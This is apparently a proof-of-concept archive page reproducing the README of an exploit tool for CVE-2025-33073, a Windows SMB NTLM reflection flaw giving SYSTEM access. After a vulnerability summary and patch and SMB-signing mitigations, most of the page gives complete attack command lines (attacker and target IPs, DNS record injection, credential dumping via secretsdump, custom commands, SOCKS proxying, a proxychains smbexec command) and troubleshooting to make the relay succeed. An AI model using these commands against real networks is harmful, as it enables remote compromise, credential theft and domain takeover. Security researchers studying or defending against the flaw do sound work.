关联漏洞
标题:Microsoft Windows SMB Server 访问控制错误漏洞 (CVE-2025-33073)描述:Microsoft Windows SMB Server是美国微软(Microsoft)公司的一个网络文件共享协议。它允许计算机上的应用程序读取和写入文件以及从计算机网络中的服务器程序请求服务。 Microsoft Windows SMB Server存在访问控制错误漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 11 Version 22H2 for x64-based Systems,Wi
描述
CVE-2025-33073
介绍
# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability 🚨
🔥 **High-Severity Authenticated Remote Code Execution** 🔥 Improper Access Control in Windows SMB Client (CWE-284)
---
## 🛡️ **Key Details at a Glance**
| **Aspect** | **Details** |
|--------------------------|-----------------------------------------------------------------------------|
| **CVSS v3.1 Score** | **8.8 (High)** 🔥 |
| **Affected Systems** | Windows 10, 11, Server 2012–2025 (all editions) 💻 |
| **Disclosure Date** | June 10, 2025 📅 (Patched in **June 2025 Patch Tuesday**) |
| **Exploitation** | **Actively exploited in the wild** 😱<br>Added to **CISA KEV** on Oct 21, 2025 |
| **Attack Vector** | Network (Authenticated) 🌐 |
| **Impact** | **SYSTEM-level code execution** 👑<br>Lateral movement via Kerberos relay |
| **Bypass** | NTLM reflection mitigations ⚡ |
---
## 🛠️ **Immediate Mitigations**
1. **Patch Now!** 🔧
→ Apply Microsoft updates (e.g., **KB5060998**)
→ [Microsoft Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) 🔗
2. **Enable SMB Signing** ✍️
→ Enforce on **all clients & servers**
→ `Set-SmbClientConfiguration -RequireSecuritySignature $true`
3. **Restrict NTLM** 🚫
→ Block NTLM where possible
→ Monitor for relay attempts with EDR tools
4. **Automated Fix?** 🤖
→ Use **Vicarius vRx** or custom scripts for mass remediation
---
## ⚠️ **Why It Matters**
- Bypasses traditional NTLM protections 🛑
- Works even with SMB signing **not enforced**
- Enables **full domain takeover** in misconfigured AD environments 🏰
---
> **Status as of November 15, 2025**:
> ✅ Patched
> ❌ **Still exploited in unpatched systems**
> 🔔 **CISA Deadline: Nov 10, 2025** ⏰
---
## ⚠️ **Example usage**
#### **GUI**
```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
```
<img width="1905" height="697" alt="454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c" src="https://github.com/user-attachments/assets/27c67345-41b0-4d57-a30f-1971b9f00498" />
---
#### **CLI**
```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
```
<img width="1593" height="612" alt="455126200-fff4fcde-0a93-43c9-b93e-990554ccb689" src="https://github.com/user-attachments/assets/4110dcb8-d712-4b02-aa55-d81459abb10d" />
---
**Custom command**
Instead of running secretsdump a custom command can be executed.
```
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
```
<img width="1456" height="389" alt="455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534" src="https://github.com/user-attachments/assets/cba92836-e8a6-4291-abd3-c14cb08e3373" />
**SOCKS**
For more stealthy execution of commands after valid connection as SYSTEM has been made. --target and --target-ip should be equal here.
```
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
```
<img width="1635" height="697" alt="455140618-8cf77803-f417-4abe-a993-746049b2634c" src="https://github.com/user-attachments/assets/56dfb7e3-245c-4851-a781-8b35a6661b1a" />
Also a custom command can be ran through proxychains instead of dumping SAM.
```
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
```
<img width="1123" height="98" alt="455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea" src="https://github.com/user-attachments/assets/dfdd9feb-0962-4999-b46a-03f28c305a47" />
---
#### Manual exploit without DNS requirement
If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.
<img width="1920" height="713" alt="455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1" src="https://github.com/user-attachments/assets/43945419-144d-463a-9059-eef477d00aca" />
#### Troubleshooting:
+ I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali. If Kali is not using the DNS server or you get a '/ FAILED' message from impacket-ntlmrelayx try adding the host to your /etc/hosts file. This should result in the attack working.
+ If using IP the attack should work. Sometimes running it multiple times will result in a SUCCESS instead of failure. It's until now not perfectly clear why this happens. I think it has something to do with networking.
+ Try another coerce method using -M or --method.
---
#### Wireshark:
Local NTLM authentication takes place
<img width="1368" height="813" alt="455252866-0a3fe643-2d52-427a-91f2-991770732f62" src="https://github.com/user-attachments/assets/17a623d1-8bb6-4c2a-b600-e1df10843d34" />
Local NTLM authentication does not take place resulting in a FAILED attempt
<img width="1360" height="820" alt="455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348" src="https://github.com/user-attachments/assets/7edcbfa7-6012-441f-a6da-0a2756ef51b8" />
---
### Good to know:
+ xterm allows copying and pasting with the middle mouse button.
+ DNS-record should also be known to the client, this can take more time in some occasions. With more time I mean give it a couple of minutes.
+ This is just a PoC which means AV/EDR bypasses have not been tried to bypass. Use at own risk.
---
**Don’t wait — patch today!** 🛑
*Your network’s security depends on it.* 💪
文件快照
[4.0K] /data/pocs/240db0e6163bcefe76323198e0dc23f69971219b
├── [5.5K] CVE-2025-33073.py
├── [ 23K] DNStool.py
└── [6.2K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。